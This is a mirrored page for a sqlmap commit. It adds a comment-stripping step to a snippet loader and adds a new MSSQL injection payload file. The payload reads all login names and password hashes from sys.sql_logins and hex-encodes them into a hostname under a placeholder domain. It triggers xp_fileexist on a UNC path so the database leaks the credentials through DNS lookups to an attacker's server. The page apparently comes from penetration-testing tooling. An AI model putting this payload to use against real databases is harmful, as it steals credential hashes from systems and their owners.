sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-04-25 03:13:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor update

Browse Source
This commit is contained in:
Miroslav Stampar 2012-02-15 13:45:10 +00:00
parent 122db6e164
commit bf923a97df
2 changed files with 7 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/common.py
View File

@ -1816,6 +1816,8 @@ def getSPLSnippet(name, **variables):
checkFile(filename) checkFile(filename)
retVal = readCachedFileContent(filename) retVal = readCachedFileContent(filename)
retVal = re.sub(r"#.+", "", retVal)
for _ in variables.keys(): for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal, flags=re.I) retVal = re.sub(r"%%%s%%" % _, variables[_], retVal, flags=re.I)

5
procs/mssql_dns_request.txt Normal file
View File

@ -0,0 +1,5 @@
# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf
DECLARE @host varchar(1024);
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');